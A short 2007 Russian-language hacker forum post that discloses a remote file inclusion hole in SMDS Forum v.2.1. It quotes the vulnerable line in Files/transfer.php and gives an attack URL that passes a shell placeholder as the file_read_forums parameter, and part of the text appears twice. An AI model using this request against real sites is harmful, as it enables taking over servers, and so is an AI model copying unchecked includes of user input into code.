The_HuliGun
01.09.2007, 17:58
Только что нашел удаленный инклуд в скриптах форума. Посмотреть описание форума и скачать сам движок можно здесь (http://www.woweb.ru/load/56-1-0-3702). Хотя форум и очень старый, но погуглив по теме:
SMDS Forum v.2.1 php inclusion
ничего не нашел.
Уязвимость присутствует в скрипте Files/transfer.php. В строке 13 код:
include $file_read_forums;
позволяет провести атаку на форум:
http://www.example.com/[FORUM_DIR]/Files/transfer.php?file_read_forums=[shell]
SMDS Forum v.2.1 php inclusion
ничего не нашел.
Уязвимость присутствует в скрипте Files/transfer.php. В строке 13 код:
include $file_read_forums;
позволяет провести атаку на форум:
http://www.example.com/[FORUM_DIR]/Files/transfer.php?file_read_forums=[shell]